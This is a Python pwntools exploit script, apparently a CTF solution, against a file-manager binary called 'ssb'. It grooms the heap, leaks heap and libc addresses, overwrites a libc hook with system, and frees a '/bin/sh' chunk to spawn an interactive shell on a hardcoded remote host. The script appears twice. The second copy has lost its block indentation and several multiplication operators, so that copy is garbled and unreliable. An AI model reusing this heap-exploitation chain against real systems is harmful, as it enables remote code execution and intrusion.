hama7230/exp.py

## exp.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('./libc-2.27.so')
elf = ELF('./ssb')
context(os='linux', arch=elf.arch)
#context(log_level='debug')  # output verbose log

RHOST = "34.85.75.40"
RPORT = 31000
LHOST = "127.0.0.1"
LPORT = 31000

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./ssb'], gdbscript=gdbscript)
else:
    conn = process(['./ssb'])
    # conn = process(['./ssb'], env={'LD_PRELOAD': './libc-2.27.so'})
    if opt == 'a': gdb.attach(conn)

def list_file():
    conn.sendlineafter('> ', '1')

def add_file(name, size, con):
    conn.sendlineafter('> ', '2')
    conn.sendlineafter('name:', name)
    conn.sendlineafter('size:', str(size))
    time.sleep(0.0001)
    conn.send(con)

def add_dir(d):
    conn.sendlineafter('> ', '3')
    conn.sendlineafter('name:', d)

def show_file(d):
    conn.sendlineafter('> ', '4')
    conn.sendlineafter('name:', d)

def change(d):
    conn.sendlineafter('> ', '5')
    conn.sendlineafter('name:', d)

def remove_file(d):
    conn.sendlineafter('> ', '6')
    conn.sendlineafter('name:', d)

# exploit
log.info('Pwning')

for i in range(4):
    add_dir(str(i+1) + 'dir')
change('1dir')
for i in range(5, 0x40):
    print i
    add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
change('..')
change('2dir')
for i in range(0x40, 0x80):
    print i
    add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
change('..')
change('3dir')
for i in range(0x80, 0xc0):
    print i
    add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
change('..')
change('4dir')
for i in range(0xc0, 0x100-1):
    print i
    add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
change('..')

add_file('255file'+'a'*0x10+p64(0x71), 0x20, 'x'*0x58+'\x81'+'\n')

remove_file('1dir')
remove_file('2dir')
payload = 'y'*0x78 + p64(0x71) + 'hoge\n'
add_file('x'*0x20, 0x100, payload)
add_file('y'*0x20, 0x100, 'y'*0x20+'\n')
remove_file('x'*0x20)
add_file('x'*0x20, 0x20, 'y'*0x50+'\x01'+'hoge\n')
change('hoge')

list_file()
conn.recvuntil('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n')
heap_addr = 0
for i in range(6):
    a = int(conn.recvuntil('file').replace('file', ''))
    print a
    heap_addr = (heap_addr << 8) + a
heap_addr =  u64(p64(heap_addr)[::-1][2::]+'\x00\x00')
dbg('heap_addr')
heap_base = heap_addr - 0x8280 - 0x70 - 0xa0
dbg('heap_base')

remove_file(str(0x90)+'file')
change('..')
remove_file('x'*0x20)
add_file('x'*0x20, 0x20, 'y'*0x50+'\x02'+'hoge\n')
remove_file('hoge')

add_file('big', 0x2000000, '\n')
remove_file('x'*0x20)
add_file('x'*0x20, 0x20, 'y'*0x50+'\x01'+'big\n')


change('big')

list_file()
conn.recvuntil('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n')
libc_addr = 0
for i in range(6):
    a = int(conn.recvuntil('file').replace('file', ''))
    conn.recvline()
    print a
    libc_addr = (libc_addr << 8) + a
libc_addr =  u64(p64(libc_addr)[::-1][2::]+'\x00\x00')
dbg('libc_addr')
libc_base = libc_addr + 0x200ff0
libc_base = libc_addr + 0x2000ff0 + 0x202000
dbg('libc_base')


payload = 'a'*0x78 + p64(0x71) + p64(libc_base+0x3ed8e8) + '\n'
add_file('aaaaaa', 0x100, payload)
change('..')
remove_file('3dir')
remove_file('4dir')
add_file('unko', 0x60, '/bin/sh\x00\n')
add_file('aaaaaa', 0x60, p64(libc_base+0x4f440)+'\n')
remove_file('unko')

conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('./libc-2.27.so')
	elf = ELF('./ssb')
	context(os='linux', arch=elf.arch)
	#context(log_level='debug') # output verbose log

	RHOST = "34.85.75.40"
	RPORT = 31000
	LHOST = "127.0.0.1"
	LPORT = 31000

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """

	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./ssb'], gdbscript=gdbscript)
	else:
	conn = process(['./ssb'])
	# conn = process(['./ssb'], env={'LD_PRELOAD': './libc-2.27.so'})
	if opt == 'a': gdb.attach(conn)

	def list_file():
	conn.sendlineafter('> ', '1')

	def add_file(name, size, con):
	conn.sendlineafter('> ', '2')
	conn.sendlineafter('name:', name)
	conn.sendlineafter('size:', str(size))
	time.sleep(0.0001)
	conn.send(con)

	def add_dir(d):
	conn.sendlineafter('> ', '3')
	conn.sendlineafter('name:', d)

	def show_file(d):
	conn.sendlineafter('> ', '4')
	conn.sendlineafter('name:', d)

	def change(d):
	conn.sendlineafter('> ', '5')
	conn.sendlineafter('name:', d)

	def remove_file(d):
	conn.sendlineafter('> ', '6')
	conn.sendlineafter('name:', d)

	# exploit
	log.info('Pwning')

	for i in range(4):
	add_dir(str(i+1) + 'dir')
	change('1dir')
	for i in range(5, 0x40):
	print i
	add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
	change('..')
	change('2dir')
	for i in range(0x40, 0x80):
	print i
	add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
	change('..')
	change('3dir')
	for i in range(0x80, 0xc0):
	print i
	add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
	change('..')
	change('4dir')
	for i in range(0xc0, 0x100-1):
	print i
	add_file(str(i)+'file', 0x20, 'x'*0x20+'\n')
	change('..')

	add_file('255file'+'a'0x10+p64(0x71), 0x20, 'x'0x58+'\x81'+'\n')

	remove_file('1dir')
	remove_file('2dir')
	payload = 'y'*0x78 + p64(0x71) + 'hoge\n'
	add_file('x'*0x20, 0x100, payload)
	add_file('y'0x20, 0x100, 'y'0x20+'\n')
	remove_file('x'*0x20)
	add_file('x'0x20, 0x20, 'y'0x50+'\x01'+'hoge\n')
	change('hoge')

	list_file()
	conn.recvuntil('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n')
	heap_addr = 0
	for i in range(6):
	a = int(conn.recvuntil('file').replace('file', ''))
	print a
	heap_addr = (heap_addr << 8) + a
	heap_addr = u64(p64(heap_addr)[::-1][2::]+'\x00\x00')
	dbg('heap_addr')
	heap_base = heap_addr - 0x8280 - 0x70 - 0xa0
	dbg('heap_base')

	remove_file(str(0x90)+'file')
	change('..')
	remove_file('x'*0x20)
	add_file('x'0x20, 0x20, 'y'0x50+'\x02'+'hoge\n')
	remove_file('hoge')

	add_file('big', 0x2000000, '\n')
	remove_file('x'*0x20)
	add_file('x'0x20, 0x20, 'y'0x50+'\x01'+'big\n')


	change('big')

	list_file()
	conn.recvuntil('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n')
	libc_addr = 0
	for i in range(6):
	a = int(conn.recvuntil('file').replace('file', ''))
	conn.recvline()
	print a
	libc_addr = (libc_addr << 8) + a
	libc_addr = u64(p64(libc_addr)[::-1][2::]+'\x00\x00')
	dbg('libc_addr')
	libc_base = libc_addr + 0x200ff0
	libc_base = libc_addr + 0x2000ff0 + 0x202000
	dbg('libc_base')


	payload = 'a'*0x78 + p64(0x71) + p64(libc_base+0x3ed8e8) + '\n'
	add_file('aaaaaa', 0x100, payload)
	change('..')
	remove_file('3dir')
	remove_file('4dir')
	add_file('unko', 0x60, '/bin/sh\x00\n')
	add_file('aaaaaa', 0x60, p64(libc_base+0x4f440)+'\n')
	remove_file('unko')

	conn.interactive()